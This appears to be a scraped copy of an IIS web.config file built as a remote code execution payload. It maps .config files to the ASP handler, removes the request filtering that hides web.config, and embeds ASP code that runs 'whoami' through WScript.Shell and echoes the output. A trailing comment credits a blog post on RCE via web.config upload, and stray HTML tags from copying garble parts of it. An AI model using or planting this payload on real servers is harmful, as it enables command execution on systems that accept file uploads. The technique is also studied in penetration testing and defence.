34 lines
1.1 KiB
Plaintext
34 lines
1.1 KiB
Plaintext
|
<?xml version="1.0″ encoding="UTF-8″?>
|
|||
|
|
<configuration>
|
|||
|
|
<system.webServer>
|
|||
|
|
<handlers accessPolicy="Read, Script, Write">
|
|||
|
|
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
|||
|
|
</handlers>
|
|||
|
|
<security>
|
|||
|
|
<requestFiltering>
|
|||
|
|
<fileExtensions>
|
|||
|
|
<remove fileExtension=".config" />
|
|||
|
|
</fileExtensions>
|
|||
|
|
<hiddenSegments>
|
|||
|
|
<remove segment="web.config" />
|
|||
|
|
</hiddenSegments>
|
|||
|
|
</requestFiltering>
|
|||
|
|
</security>
|
|||
|
|
</system.webServer>
|
|||
|
|
<appSettings>
|
|||
|
|
</appSettings>
|
|||
|
|
</configuration>
|
|||
|
|
<!–
|
|||
|
|
<% Response.write("-"&"->")
|
|||
|
|
Response.write("</p>
|
|||
|
|
<pre>")</p>
|
|||
|
|
<p>Set wShell1 = CreateObject("WScript.Shell")
|
|||
|
|
Set cmd1 = wShell1.Exec("whoami")
|
|||
|
|
output1 = cmd1.StdOut.Readall()
|
|||
|
|
set cmd1 = nothing: Set wShell1 = nothing</p>
|
|||
|
|
<p>Response.write(output1)
|
|||
|
|
Response.write("</pre>
|
|||
|
|
<p><!-"&"-") %>
|
|||
|
|
–>
|
|||
|
|
|
|||
|
|
<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->
|